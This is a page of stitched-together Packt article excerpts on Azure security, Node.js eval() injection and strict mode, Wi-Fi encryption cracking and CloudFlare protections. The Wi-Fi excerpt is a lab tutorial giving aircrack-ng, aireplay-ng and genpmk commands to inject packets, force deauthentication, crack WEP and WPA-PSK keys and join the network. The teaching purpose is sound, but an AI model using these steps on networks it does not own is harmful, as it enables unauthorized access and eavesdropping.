scenarios). The Microsoft Azure Trust Center (http://azure.microsoft.com/en-us/support/trust-center/) highlights the attention given to the Cloud infrastructure, in terms of what Microsoft does to enforce security, privacy, and compliance. Identity and Access Management It is very common that different people within the same organization would access and use the same Azure resources. In this case, a few scenarios arise: with the current portal, we can add several co-administrators; with the Preview portal, we can define fine-grained ACLs with the Role-Based Access Control (RBAC) features it implements. By default, we can add external users into the Azure Active Directory (AD), by inviting them through their e-mail address, which must be either a Microsoft account or an Azure AD account. In the Preview portal, the following hierarchy is, as follows: Subscription: It is the permission given at the subscription level, which is valid for each object within the subscription (that is, a Reader subscription can view everything within the subscription). Resource group: This is a fairly new concept of Azure. A resource group is (as the name suggests) a group or resources logically connected, as the collection of resources used for the same web project (a web hosting plan, an SQL server, and so on). Permission given at this level is valid for each object within the resource group. Individual resource: It is the permission given to an individual resource, and is valid only for that resource (that is, giving read-only access to a client to view the Application Insights of a website). Despite it resembles from its name, Azure AD is just an Identity and Access Management (IAM) service, managed and hosted by Microsoft in Azure. We should not even try to make a comparison, because they have different scopes and features. It is true that we can link Azure AD with an on-premise AD, but only for the purpose of extending its functionalities to work with Internet-based applications. Azure AD can be considered a SaaS for IAM before its relationship with Azure Services. A company that is offers its SaaS solution to clients, can also use Azure AD as the Identity Provider, relying on the several existing users of Office 365 (which relies on Azure AD for authentication) or Azure AD itself. Access Control Service (ACS) has been famous for a while for its capability to act as an identity bridge between applications and social identities. In the last few years, if developers wanted to integrate Facebook, Google, Yahoo, and Microsoft accounts (Live ID), they would have probably used ACS. Using Platform as a Service Although there are several ways to host custom code on Azure, the two most important building blocks are Websites and Cloud services. The first is actually a PaaS built on top of the second (a PaaS too), and uses an open source engine named Project Kudu (https://github.com/projectkudu/kudu). Kudu is an open source engine, which works with IIS and manages automatic or manual deployments of Azure Websites in a sandboxed environment. Kudu can also run outside Azure, but it is primarily supported to enable Website services. An Azure Cloud service is a container of roles: a role is the representation of a unit of execution and it can be a worker role (an arbitrary application) or a web role (an IIS application). Each role within a Cloud service can be deployed to several VMs (instances) at the same time, to provide scalability and load-balancing. From the security perspective, we need to pay attention to these aspects: Remote endpoints Remote desktops Startup tasks Microsoft Antimalware Network communication Azure Websites are some of the most advanced PaaS in the Cloud computing market, providing users with a lock-in free solution to run applications built in various languages/platforms. From the security perspective, we need to pay attention to these aspects: Credentials Connection modes Settings and connection strings Backups Extensions Azure services have grown much faster (with regard to the number of services and the surface area) than in the past, at an amazingly increasing rate: consequently, we have several options to store any kind of data (relational, NoSQL, binary, JSON, and so on). Azure Storage is the base service for almost everything on the platform. Storage security is implemented in two different ways: Account Keys Shared Access Signatures While looking at the specifications of many Azure Services, we often see the scalability targets section. For a given service, Azure provides users with a set of upper limits, in terms of capacity, bandwidth, and throughput to let them design their Cloud solutions better. Working with SQL Database is straightforward. However, a few security best practices must be implemented to improve security: Setting up firewall rules Setting up users and roles Connection settings Modern software architectures often rely on an in-memory caching system to save frequently accessed data that do not change too often. Some extreme scenarios require us to use an in-memory cache as the primary data store for sensitive data, pursuing design patterns oriented to eventual persistence and consistency. Azure Managed Cache is the evolution of the former AppFabric Cache for Windows servers and it is a managed by an in-memory cache service. Redis is an open source, high performance data store written in ANSI C: since its name stands for Remote Dictionary Server, it is a key value data store with optional durability. Azure Key Vault is a new and promising service that is used to store cryptographic keys and application secrets. There is an official library to operate against Key Vault from .NET, using Azure AD authentication to get secrets or use the keys. Before using it, it is necessary to set appropriate permissions on the Key Vault for external access, using the Set-AzureKeyVaultAccessPolicy command. Using Infrastructure as a Service Customers choosing Infrastructure as a Service (IaaS) usually have existing project constraints, which are not adaptive to PaaS. We can think about a complex installation of an enterprise-level software suite, such as ERP or a SharePoint farm. This is one of the cases where a service, such as an Azure Website, probably cannot fit. There two main services where the security requirements should be correctly understood and addressed are: Azure Virtual Machines Azure Virtual Networks VMs are the most configurable execution environments for applications that Azure provides. With VMs, we can run arbitrary workloads and run custom tools and applications, but we need to manage and maintain them directly, including the security. From the security perspective, we need to pay attention to these aspects: VM creation Endpoints and ACLs Networking and isolation Microsoft Antimalware Operating system firewalls Auditing and best practices Azure Backup helps protect servers or clients against data loss, providing a second place backup solution. While performing a backup, in fact, one of the primary requirements is the location of the backup: avoid backing up sensitive or critical data to a physical location that is strictly connected to the primary source of the data itself. In case of a disaster, if you involve the facility where the source is located, a higher probability of losing data (including the backup) can occur. Summary In this article we covered the various security related aspects of Microsoft Azure with services, such as PaaS, IaaS, and IAM. Resources for Article: Further resources on this subject: Web API and Client Integration [article] Setting up of Software Infrastructure on the Cloud [article] Windows Phone 8 Applications [article]
Read more
  • 0
  • 0
  • 11699
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-general-considerations
Packt
25 Oct 2013
9 min read
Save for later

General Considerations

Packt
25 Oct 2013
9 min read
(For more resources related to this topic, see here.) Building secure Node.js applications will require an understanding of the many different layers that it is built upon. Starting from the bottom, we have the language specification that defines what JavaScript consists of. Next, the virtual machine executes your code and may have differences from the specification. Following that, the Node.js platform and its API have details in their operation that affect your applications. Lastly, third-party modules interact with our own code and need to be audited for secure programming practices. First, JavaScript's official name is ECMAScript. The international European Computer Manufacturers Association (ECMA) first standardized the language as ECMAScript in 1997. This ECMA-262 specification defines what comprises JavaScript as a language, including its features, and even some of its bugs. Even some of its general quirkiness has remained unchanged in the specification to maintain backward compatibility. While I won't say the specification itself is required reading, I will say that it is worth considering. Second, Node.js uses Google's V8 virtual machine to interpret and execute your source code. While developing for the browser, you have to consider all the other virtual machines (not to mention versions), when it comes to available features. In a Node.js application, your code only runs on the server, so you have much more freedom, and you can use all the features available to you in V8. Additionally, you can also optimize for the V8 engine exclusively. Next, Node.js handles setting up the event loop, and it takes your code to register callbacks for events and executes them accordingly. There are some important details regarding how Node.js responds to exceptions and other errors that you will need to be aware of while developing your applications. Atop Node.js is the developer API. This API is written mostly in JavaScript which allows you, as a JavaScript developer, to read it for yourself, and understand how it works. There are many provided modules that you will likely end up using, and it's important for you to know how they work, so you can code defensively. Last, but not least, the third-party modules that npm gives you access to, are in great abundance, which can be a double-edged sword. On one hand, you have many options to pick from that suit your needs. On the other hand, having a third-party code is a potential security liability, as you will be expected to support and audit each of these modules (in addition to their own dependencies) for security vulnerabilities. JavaScript security One of the biggest security risks in JavaScript itself, both on the client and now on the server, is the use of the eval() function. This function, and others like it, takes a string argument, which can represent an expression, statement, or a series of statements, and it is executed as any other JavaScript source code. This is demonstrated in the following code: // these variables are available to eval()'d code // assume these variables are user input from a POST request var a = req.body.a; // => 1 var b = req.body.b; // => 2 var sum = eval(a + "+" + b); // same as '1 + 2' This code has full access to the current scope, and can even affect the global object, giving it an alarming amount of control. Let's look at the same code, but imagine if someone malicious sent arbitrary JavaScript code instead of a simple number. The result is shown in the following code: var a = req.body.a; // => 1 var b = req.body.b; // => 2; console.log("corrupted"); var sum = eval(a + "+" + b); // same as '1 + 2; console.log("corrupted"); Due to how eval() is exploited here, we are witnessing a "remote code execution" attack! When executed directly on the server, an attacker could gain access to server files and databases. There are a few cases where eval() can be useful, but if the user input is involved in any step of the process, it should likely be avoided at all costs! There are other features of JavaScript that are functional equivalents to eval(), and should likewise be avoided unless absolutely necessary. First is the Function constructor that allows you to create a callable function from strings, as shown in the following code: // creates a function that returns the sum of 2 arguments var adder = new Function("a", "b", "return a + b"); adder(1, 2); // => 3 While very similar to the eval() function, it is not exactly the same. This is because it does not have access to the current scope. However, it does still have access to the global object, and should be avoided whenever a user input is involved. If you find yourself in a situation where there is an absolute need to execute an arbitrary code that involves user input, you do have one secure option. Node.js platform's API includes a vm module that is meant to give you the ability to compile and run code in a sandbox, preventing manipulation of the global object and even the current scope. It should be noted that the vm module has many known issues and edge cases. You should read the documentation, and understand all the implications of what you are doing to make sure you don't get caught off-guard. ES5 features ECMAScript5 included an extensive batch of changes to JavaScript, including the following changes: Strict mode for removing unsafe features from the language. Property descriptors that give you control over object and property access. Functions for changing object mutability. Strict mode Strict mode changes the way JavaScript code runs in select cases. First, it causes errors to be thrown in cases that were silent before. Second, it removes and/or change features that made optimizations for JavaScript engines either difficult or impossible. Lastly, it prohibits some syntax that is likely to show up in future versions of JavaScript. Additionally, strict mode is opt-in only, and can be applied either globally or for an individual function scope. For Node.js applications, to enable strict mode globally, add the –use_strict command line flag, while executing your program. While dealing with third-party modules that may or may not be using strict mode, this can potentially have negative side effects on your overall application. With that said, you could potentially make strict mode compliance a requirement for any audits on third-party modules. Strict mode can be enabled by adding the "use strict" pragma at the beginning of a function, before any other expressions as shown in the following code: function sayHello(name) { "use strict"; // enables strict mode for this function scope console.log("hello", name); } In Node.js, all the required files are wrapped with a function expression that handles the CommonJS module API. As a result, you can enable strict mode for an entire file, by simply putting the directive at the top of the file. This will not enable strict mode globally, as it would in an environment like the browser. Strict mode makes many changes to the syntax and runtime behavior, but for the sake of brevity we will only discuss changes relevant to application security. First, scripts run via eval() in strict mode cannot introduce new variables to the enclosing scope. This prevents leaking new and possibly conflicting variables into your code, when you run eval() as shown in the following code: "use strict"; eval("var a = true"); console.log(a); // ReferenceError thrown – a does not exist In addition, the code run via eval() is not given access to the global object through its context. This is similar, if not related, to other changes for function scope, which will be explained shortly, but this is specifically important for eval(), as it can no longer use the global object to perform additional black magic. It turns out that the eval() function is able to be overridden in JavaScript. It can be accomplished by creating a new global variable called eval, and assigning something else to it, which could be malicious. Strict mode prohibits this type of operation. It is treated more like a language keyword than a variable, and attempting to modify it will result in a syntax error as shown in the following code: // all of the examples below are syntax errors "use strict"; eval = 1; ++eval; var eval; function eval() { } Next, the function objects are more tightly secured. Some common extensions to ECMAScript add the function.caller and function.arguments references to each function, after it is invoked. Effectively, you can "walk" the call stack for a specific function by traversing these special references. This potentially exposes information that would normally appear to be out of scope. Strict mode simply makes these properties throw a TypeError remark, while attempting to read or write them, as shown in the following code: "use strict"; function restricted() { restricted.caller; // TypeError thrown restricted.arguments; // TypeError thrown } Next, arguments.callee is removed in strict mode (such as function.caller and function.arguments shown previously). Normally, arguments.callee refers to the current function, but this magic reference also exposes a way to "walk" the call stack, and possibly reveal information that previously would have been hidden or out of scope. In addition, this object makes certain optimizations difficult or impossible for JavaScript engines. Thus, it also throws a TypeError exception, when an access is attempted, as shown in the following code: "use strict"; function fun() { arguments.callee; // TypeError thrown } Lastly, functions executed with null or undefined as the context no longer coerce the global object as the context. This applies to eval() as we saw earlier, but goes further to prevent arbitrary access to the global object in other function invocations, as shown in the following code: "use strict"; (function () { console.log(this); // => null }).call(null); Strict mode can help make the code far more secure than before, but ECMAScript 5 also includes access control through the property descriptor APIs. A JavaScript engine has always had the capability to define property access, but ES5 includes these APIs to give that same power to application developers. Summary In this article, we examined the security features that applied generally to the language of JavaScript itself, including how to use static code analysis to check for many of the aforementioned pitfalls. Also, we looked at some of the inner workings of a Node.js application, and how it differs from typical browser development, when it comes to security. Resources for Article: Further resources on this subject: Setting up Node [Article] So, what is Node.js? [Article] Learning to add dependencies [Article]
Read more
  • 0
  • 0
  • 11391

article-image-wlan-encryption-flaws
Packt
25 Mar 2015
21 min read
Save for later

WLAN Encryption Flaws

Packt
25 Mar 2015
21 min read
In this article by Cameron Buchanan, author of the book Kali Linux Wireless Penetration Testing Beginner's Guide. (For more resources related to this topic, see here.) "640K is more memory than anyone will ever need."                                                                             Bill Gates, Founder, Microsoft Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be foolproof encryption mechanisms but, over time, both these mechanisms had flaws that have been widely publicized and exploited in the real world. WLAN encryption mechanisms have had a long history of being vulnerable to cryptographic attacks. It started with WEP in early 2000, which eventually was completely broken. In recent times, attacks are slowly targeting WPA. Even though there is no public attack available currently to break WPA in all general conditions, there are attacks that are feasible under special circumstances. In this section, we will take a look at the following topics: Different encryption schemas in WLANs Cracking WEP encryption Cracking WPA encryption   WLAN encryption WLANs transmit data over the air and thus there is an inherent need to protect data confidentiality. This is best done using encryption. The WLAN committee (IEEE 802.11) formulated the following protocols for data encryption: Wired Equivalent Privacy (WEP) Wi-Fi Protected Access (WPA) Wi-Fi Protection Access v2 (WPAv2) In this section, we will take a look at each of these encryption protocols and demonstrate various attacks against them. WEP encryption The WEP protocol was known to be flawed as early as 2000 but, surprisingly, it is still continuing to be used and access points still ship with WEP enabled capabilities. There are many cryptographic weaknesses in WEP and they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope, as it involves understanding complex math. In this section, we will take a look at how to break WEP encryption using readily available tools on the BackTrack platform. This includes the entire aircrack-ng suite of tools—airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and others. The fundamental weakness in WEP is its use of RC4 and a short IV value that is recycled every 224 frames. While this is a large number in itself, there is a 50 percent chance of four reuses every 5,000 packets. To use this to our advantage, we generate a large amount of traffic so that we can increase the likelihood of IVs that have been reused and thus compare two cipher texts encrypted with the same IV and key. Let's now first set up WEP in our test lab and see how we can break it. Time for action – cracking WEP Follow the given instructions to get started: Let's first connect to our access point Wireless Lab and go to the settings area that deals with wireless encryption mechanisms: On my access point, this can be done by setting the Security Mode to WEP. We will also need to set the WEP key length. As shown in the following screenshot, I have set WEP to use 128bit keys. I have set the default key to WEP Key 1 and the value in hex to abcdefabcdefabcdefabcdef12 as the 128-bit WEP key. You can set this to whatever you choose: Once the settings are applied, the access point should now be offering WEP as the encryption mechanism of choice. Let's now set up the attacker machine. Let's bring up Wlan0 by issuing the following command: ifconfig wlan0 up Then, we will run the following command: airmon-ng start wlan0 This is done so as to create mon0, the monitor mode interface, as shown in the following screenshot. Verify that the mon0 interface has been created using the iwconfig command: Let's run airodump-ng to locate our lab access point using the following command: airodump-ng mon0 As you can see in the following screenshot, we are able to see the Wireless Lab access point running WEP: For this exercise, we are only interested in the Wireless Lab, so let's enter the following command to only see packets for this network: airodump-ng –bssid 00:21:91:D2:8E:25 --channel 11 --write WEPCrackingDemo mon0 The preceding command line is shown in the following screenshot: We will request airodump-ng to save the packets into a pcap file using the --write directive: Now let's connect our wireless client to the access point and use the WEP key as abcdefabcdefabcdefabcdef12. Once the client has successfully connected, airodump-ng should report it on the screen. If you do an ls in the same directory, you will be able to see files prefixed with WEPCrackingDemo-*, as shown in the following screenshot. These are traffic dump files created by airodump-ng: If you notice the airodump-ng screen, the number of data packets listed under the #Data column is very few in number (only 68). In WEP cracking, we need a large number of data packets, encrypted with the same key to exploit weaknesses in the protocol. So, we will have to force the network to produce more data packets. To do this, we will use the aireplay-ng tool: We will capture ARP packets on the wireless network using Aireplay-ng and inject them back into the network to simulate ARP responses. We will be starting Aireplay-ng in a separate window, as shown in the next screenshot. Replaying these packets a few thousand times, we will generate a lot of data traffic on the network. Even though Aireplay-ng does not know the WEP key, it is able to identify the ARP packets by looking at the size of the packets. ARP is a fixed header protocol; thus, the size of the ARP packets can be easily determined and can be used to identify them even within encrypted traffic. We will run aireplay-ng with the options that are discussed next. The -3 option is for ARP replay, -b specifies the BSSID of our network, and -h specifies the client MAC address that we are spoofing. We need to do this, as replay attacks will only work for authenticated and associated client MAC addresses: Very soon you should see that aireplay-ng was able to sniff ARP packets and started replaying them into the network. If you encounter channel-related errors as I did, append –ignore-negative-one to your command, as shown in the following screenshot: At this point, airodump-ng will also start registering a lot of data packets. All these sniffed packets are being stored in the WEPCrackingDemo-* files that we saw previously: Now let's start with the actual cracking part! We fire up aircrack-ng with the option WEPCRackingDemo-0*.cap in a new window. This will start the aircrack-ng software and it will begin working on cracking the WEP key using the data packets in the file. Note that it is a good idea to have Airodump-ng collect the WEP packets, aireplay-ng do the replay attack, and aircrack-ng attempt to crack the WEP key based on the captured packets, all at the same time. In this experiment, all of them are open in separate windows. Your screen should look like the following screenshot when aircrack-ng is working on the packets to crack the WEP key: The number of data packets required to crack the key is nondeterministic, but generally in the order of a hundred thousand or more. On a fast network (or using aireplay-ng), this should take 5-10 minutes at most. If the number of data packets currently in the file is not sufficient, then aircrack-ng will pause, as shown in the following screenshot, and wait for more packets to be captured; it will then restart the cracking process: Once enough data packets have been captured and processed, aircrack-ng should be able to break the key. Once it does, it proudly displays it in the terminal and exits, as shown in the following screenshot: It is important to note that WEP is totally flawed and any WEP key (no matter how complex) will be cracked by Aircrack-ng. The only requirement is that a large enough number of data packets, encrypted with this key, are made available to aircrack-ng. What just happened? We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the aireplay-ng tool to replay ARP packets into the network. This caused the network to send ARP replay packets, thus greatly increasing the number of data packets sent over the air. We then used the aircrack-ng tool to crack the WEP key by analyzing cryptographic weaknesses in these data packets. Note that we can also fake an authentication to the access point using the Shared Key Authentication bypass technique. This can come in handy if the legitimate client leaves the network. This will ensure that we can spoof an authentication and association and continue to send our replayed packets into the network. Have a go hero – fake authentication with WEP cracking In the previous exercise, if the legitimate client had suddenly logged off the network, we would not have been able to replay the packets as the access point will refuse to accept packets from un-associated clients. While WEP cracking is going on. Log off the legitimate client from the network and verify that you are still able to inject packets into the network and whether the access point accepts and responds to them. WPA/WPA2 WPA( or WPA v1 as it is referred to sometimes) primarily uses the TKIP encryption algorithm. TKIP was aimed at improving WEP, without requiring completely new hardware to run it. WPA2 in contrast mandatorily uses the AES-CCMP algorithm for encryption, which is much more powerful and robust than TKIP. Both WPA and WPA2 allow either EAP-based authentication, using RADIUS servers (Enterprise) or a Pre-Shared key (PSK) (personal)-based authentication schema. WPA/WPA2 PSK is vulnerable to a dictionary attack. The inputs required for this attack are the four-way WPA handshake between client and access point, and a wordlist that contains common passphrases. Then, using tools such as Aircrack-ng, we can try to crack the WPA/WPA2 PSK passphrase. An illustration of the four-way handshake is shown in the following screenshot: The way WPA/WPA2 PSK works is that it derives the per-session key, called the Pairwise Transient Key (PTK), using the Pre-Shared Key and five other parameters—SSID of Network, Authenticator Nounce (ANounce), Supplicant Nounce (SNounce), Authenticator MAC address (Access Point MAC), and Suppliant MAC address (Wi-Fi Client MAC). This key is then used to encrypt all data between the access point and client. An attacker who is eavesdropping on this entire conversation by sniffing the air can get all five parameters mentioned in the previous paragraph. The only thing he does not have is the Pre-Shared Key. So, how is the Pre-Shared Key created? It is derived by using the WPA-PSK passphrase supplied by the user, along with the SSID. The combination of both of these is sent through the Password-Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key. In a typical WPA/WPA2 PSK dictionary attack, the attacker would use a large dictionary of possible passphrases with the attack tool. The tool would derive the 256-bit Pre-Shared key from each of the passphrases and use it with the other parameters, described earlier, to create the PTK. The PTK will be used to verify the Message Integrity Check (MIC) in one of the handshake packets. If it matches, then the guessed passphrase from the dictionary was correct; if not, it was incorrect. Eventually, if the authorized network passphrase exists in the dictionary, it will be identified. This is exactly how WPA/WPA2 PSK cracking works! The following figure illustrates the steps involved: In the next exercise, we will take a look at how to crack a WPA PSK wireless network. The exact same steps will be involved in cracking a WPA2-PSK network using CCMP(AES) as well. Time for action – cracking WPA-PSK weak passphrases Follow the given instructions to get started: Let's first connect to our access point Wireless Lab and set the access point to use WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh so that it is vulnerable to a dictionary attack: We start airodump-ng with the following command so that it starts capturing and storing all packets for our network: airodump-ng –bssid 00:21:91:D2:8E:25 –channel 11 –write WPACrackingDemo mon0" The following screenshot shows the output: Now we can wait for a new client to connect to the access point so that we can capture the four-way WPA handshake, or we can send a broadcast deauthentication packet to force clients to reconnect. We do the latter to speed things up. The same thing can happen again with the unknown channel error. Again, use –-ignore-negative-one. This can also require more than one attempt: As soon as we capture a WPA handshake, the airodump-ng tool will indicate it in the top-right corner of the screen with a WPA handshake followed by the access point's BSSID. If you are using –ignore-negative-one, the tool may replace the WPA handshake with a fixed channel message. Just keep an eye out for a quick flash of a WPA handshake. We can stop the airodump-ng utility now. Let's open up the cap file in Wireshark and view the four-way handshake. Your Wireshark terminal should look like the following screenshot. I have selected the first packet of the four-way handshake in the trace file in the screenshot. The handshake packets are the one whose protocol is EAPOL: Now we will start the actual key cracking exercise! For this, we need a dictionary of common words. Kali ships with many dictionary files in the metasploit folder located as shown in the following screenshot. It is important to note that, in WPA cracking, you are just as good as your dictionary. BackTrack ships with some dictionaries, but these may be insufficient. Passwords that people choose depend on a lot of things. This includes things such as which country users live in, common names and phrases in that region the, security awareness of the users, and a host of other things. It may be a good idea to aggregate country- and region-specific word lists, when undertaking a penetration test: We will now invoke the aircrack-ng utility with the pcap file as the input and a link to the dictionary file, as shown in the following screenshot. I have used nmap.lst , as shown in the terminal: aircrack-ng uses the dictionary file to try various combinations of passphrases and tries to crack the key. If the passphrase is present in the dictionary file, it will eventually crack it and your screen will look similar to the one in the screenshot: Please note that, as this is a dictionary attack, the prerequisite is that the passphrase must be present in the dictionary file you are supplying to aircrack-ng. If the passphrase is not present in the dictionary, the attack will fail! What just happened? We set up WPA-PSK on our access point with a common passphrase: abcdefgh. We then use a deauthentication attack to have legitimate clients reconnect to the access point. When we reconnect, we capture the four-way WPA handshake between the access point and the client. As WPA-PSK is vulnerable to a dictionary attack, we feed the capture file that contains the WPA four-way handshake and a list of common passphrases (in the form of a wordlist) to Aircrack-ng. As the passphrase abcdefgh is present in the wordlist, Aircrack-ng is able to crack the WPA-PSK shared passphrase. It is very important to note again that, in WPA dictionary-based cracking, you are just as good as the dictionary you have. Thus, it is important to compile a large and elaborate dictionary before you begin. Though BackTrack ships with its own dictionary, it may be insufficient at times and might need more words, especially taking into account the localization factor. Have a go hero – trying WPA-PSK cracking with Cowpatty Cowpatty is a tool that can also crack a WPA-PSK passphrase using a dictionary attack. This tool is included with BackTrack. I leave it as an exercise for you to use Cowpatty to crack the WPA-PSK passphrase. Also, set an uncommon passphrase that is not present in the dictionary and try the attack again. You will now be unsuccessful in cracking the passphrase with both Aircrack-ng and Cowpatty. It is important to note that the same attack applies even to a WPA2 PSK network. I encourage you to verify this independently. Speeding up WPA/WPA2 PSK cracking As we have already seen in the previous section, if we have the correct passphrase in our dictionary, cracking WPA-Personal will work every time like a charm. So, why don't we just create a large elaborate dictionary of millions of common passwords and phrases people use? This would help us a lot and most of the time, we would end up cracking the passphrase. It all sounds great but we are missing one key component here— the time taken. One of the more CPU and time-consuming calculations is that of the Pre-Shared key using the PSK passphrase and the SSID through the PBKDF2. This function hashes the combination of both over 4,096 times before outputting the 256-bit Pre-Shared key. The next step in cracking involves using this key along with parameters in the four-way handshake and verifying against the MIC in the handshake. This step is computationally inexpensive. Also, the parameters will vary in the handshake every time and hence, this step cannot be precomputed. Thus, to speed up the cracking process, we need to make the calculation of the Pre-Shared key from the passphrase as fast as possible. We can speed this up by precalculating the Pre-Shared Key, also called the Pairwise Master Key (PMK) in 802.11 standard parlance. It is important to note that, as the SSID is also used to calculate the PMK, with the same passphrase and with a different SSID, we will end up with a different PMK. Thus, the PMK depends on both the passphrase and the SSID. In the next exercise, we will take a look at how to precalculate the PMK and use it for WPA/WPA2 PSK cracking. Time for action – speeding up the cracking process We can proceed with the following steps: We can precalculate the PMK for a given SSID and wordlist using the genpmk tool with the following command: genpmk –f <chosen wordlist>–d PMK-Wireless-Lab –s "Wireless Lab This creates the PMK-Wireless-Lab file containing the pregenerated PMK: We now create a WPA-PSK network with the passphrase abcdefgh (present in the dictionary we used) and capture a WPA-handshake for that network. We now use Cowpatty to crack the WPA passphrase, as shown in the following screenshot: It takes approximately 7.18 seconds for Cowpatty to crack the key, using the precalculated PMKs. We now use aircrack-ng with the same dictionary file, and the cracking process takes over 22 minutes. This shows how much we are gaining because of the precalculation. In order to use these PMKs with aircrack-ng, we need to use a tool called airolib-ng. We will give it the options airolib-ng, PMK-Aircrack --import,and cowpatty PMK-Wireless-Lab, where PMK-Aircrack is the aircrack-ng compatible database to be created and PMK-Wireless-Lab is the genpmk compliant PMK database that we created previously. We now feed this database to aircrack-ng and the cracking process speeds up remarkably. We use the following command: aircrack-ng –r PMK-Aircrack WPACrackingDemo2-01.cap There are additional tools available on BackTrack such as Pyrit that can leverage multi CPU systems to speed up cracking. We give the pcap filename with the -r option and the genpmk compliant PMK file with the -i option. Even on the same system used with the previous tools, Pyrit takes around 3 seconds to crack the key, using the same PMK file created using genpmk. What just happened? We looked at various different tools and techniques to speed up WPA/WPA2-PSK cracking. The whole idea is to pre-calculate the PMK for a given SSID and a list of passphrases in our dictionary. Decrypting WEP and WPA packets In all the exercises we have done till now, we cracked the WEP and WPA keys using various techniques. What do we do with this information? The first step is to decrypt data packets we have captured using these keys. In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we captured over the air, using the keys we cracked. Time for action – decrypting WEP and WPA packets We can proceed with the following steps: We will decrypt packets from the WEP capture file we created earlier: WEPCrackingDemo-01.cap. For this, we will use another tool in the Aircrack-ng suite called airdecap-ng. We will run the following command, as shown in the following screenshot, using the WEP key we cracked previously: airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-02.cap The decrypted files are stored in a file named WEPCrackingDemo-02-dec.cap. We use the tshark utility to view the first ten packets in the file. Please note that you may see something different based on what you captured: WPA/WPA2 PSK will work in exactly the same way as with WEP, using the airdecap-ng utility, as shown in the following screenshot, with the following command: airdecap-ng –p abdefg WPACrackingDemo-02.cap –e "Wireless Lab" What just happened? We just saw how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using Airdecap-ng. It is interesting to note that we can do the same using Wireshark. We would encourage you to explore how this can be done by consulting the Wireshark documentation. Connecting to WEP and WPA networks We can also connect to the authorized network after we have cracked the network key. This can come in handy during penetration testing. Logging onto the authorized network with the cracked key is the ultimate proof you can provide to your client that his network is insecure. Time for action – connecting to a WEP network We can proceed with the following steps: Use the iwconfig utility to connect to a WEP network, once you have the key. In a past exercise, we broke the WEP key—abcdefabcdefabcdefabcdef12: What just happened? We saw how to connect to a WEP network. Time for action – connecting to a WPA network We can proceed with the following steps: In the case of WPA, the matter is a bit more complicated. The iwconfig utility cannot be used with WPA/WPA2 Personal and Enterprise, as it does not support it. We will use a new tool called WPA_supplicant for this lab. To use WPA_supplicant for a network, we will need to create a configuration file, as shown in the following screenshot. We will name this file wpa-supp.conf: We will then invoke the WPA_supplicant utility with the following options: -D wext -i wlan0 –c wpa-supp.conf to connect to the WPA network we just cracked. Once the connection is successful, WPA_supplicant will give you the message: Connection to XXXX completed. For both the WEP and WPA networks, once you are connected, you can use dhcpclient to grab a DHCP address from the network by typing dhclient3 wlan0. What just happened? The default Wi-Fi utility iwconfig cannot be used to connect to WPA/WPA2 networks. The de-facto tool for this is WPA_Supplicant. In this lab, we saw how we can use it to connect to a WPA network. Summary In this section, we learnt about WLAN encryption. WEP is flawed and no matter what the WEP key is, with enough data packet samples: it is always possible to crack WEP. WPA/WPA2 is cryptographically un-crackable currently; however, under special circumstances, such as when a weak passphrase is chosen in WPA/WPA2-PSK, it is possible to retrieve the passphrase using dictionary attacks. Resources for Article: Further resources on this subject: Veil-Evasion [article] Wireless and Mobile Hacks [article] Social Engineering Attacks [article]
Read more
  • 0
  • 0
  • 11009

article-image-features-cloudflare
Packt
10 Sep 2013
5 min read
Save for later

Features of CloudFlare

Packt
10 Sep 2013
5 min read
(For more resources related to this topic, see here.) Top 5 features you need to know about Here we will go over the various security, performance, and monitoring features CloudFlare has to offer. Malicious traffic Any website is susceptible to attacks from malicious traffic. Some attacks might try to take down a targeted website, while others may try to include their own spam. Worse attacks might even try and trick your users to provide information or compromise user accounts. CloudFlare has tools available to mitigate various types of attacks. Distributed denial of service A common attack on the Internet is the distributed denial-of-service(DDoS) attack. A distributed denial-of-service attack involves producing so many requests for a service that it cannot fulfill them, and crumbles under the load. A common way this is handled in practice is by having the attacker make a server request, but never listen for the response. Typically a response will be presented by the client notifying the server that it received data, but if a client does not acknowledge, the server will keep trying for quite a while. A single client could send thousands of these requests per second, but the server would not be able to handle many at once. Another twist to these attacks is the dynamic denial-of-service attack. This attack will be spread across many machines, making it difficult to tell where the attacks are coming from. CloudFlare can help with this because it can monitor when users are trying an attack and reject access, or require a captcha challenge to gain access. It also monitors all of its customers for this, so if there is an attack happening on another CloudFlare site, it can protect yours from the traffic attacking the site as well. It is a difficult problem to solve. Sometimes traffic just spikes if big news article are run. It is hard to tell when it's legitimate traffic and when it is an attack. For this, CloudFlare offers multiple levels of DoS protection. On the CloudFlare settings the Securitytab is where you can configure this advanced protection: On the CloudFlare settings the Security tab is where you can configure this advanced protection: The basic settings are rolled into the Basic protection level setting: SQL injection SQL injection is a more involved attack. On a web page, you may have a field like a username/password field. That field will probably be checked against a database for validity. The database queries to do this are simple text strings. This means that if the query is written in a way that doesn't explicitly prevent it, an attacker can start writing their own queries. A site that is not equipped to handle these cases would be susceptible to hackers destroying data, gaining access by pretending to be other users, or accessing data they otherwise would not have access to. It is a difficult problem to check against when building a software. Even big companies have had issues. CloudFlare mitigates this by looking for requests containing things that look like database queries. Almost no websites take in raw database commands as normal queries. This means that CloudFlare can search for suspicious traffic and prevent it from accessing your page. Cross-site scripting Cross-site scripting is similar to SQL injection except that it deals with JavaScript and not database SQL. If you have a site that has comments, for example, an unprotected site might allow a hacker to put their own JavaScript on it. Any other user of the site could execute that JavaScript. They could do things like sniff for passwords, or even credit card information. CloudFlare prevents this in a similar fashion by looking for requests that contain JavaScript and blocking them. Open ports Often, services available on a server can be available without the sysadmin knowing about it. If Telnet is allowed, for example, an attacker could simply log in to the system and start checking out source code, looking into the database, or taking down the website. CloudFlare acts as a firewall to ensure that the ports are blocked even if the server has them open. Challenge page When CloudFlare receives a request from a suspect user, it will usually show a challenge page asking the user to fill out a captcha to access the site. The options for customizing these settings is on the Security Settings tab: You can also configure how that page looks by clicking on Customize. By default, it will look something 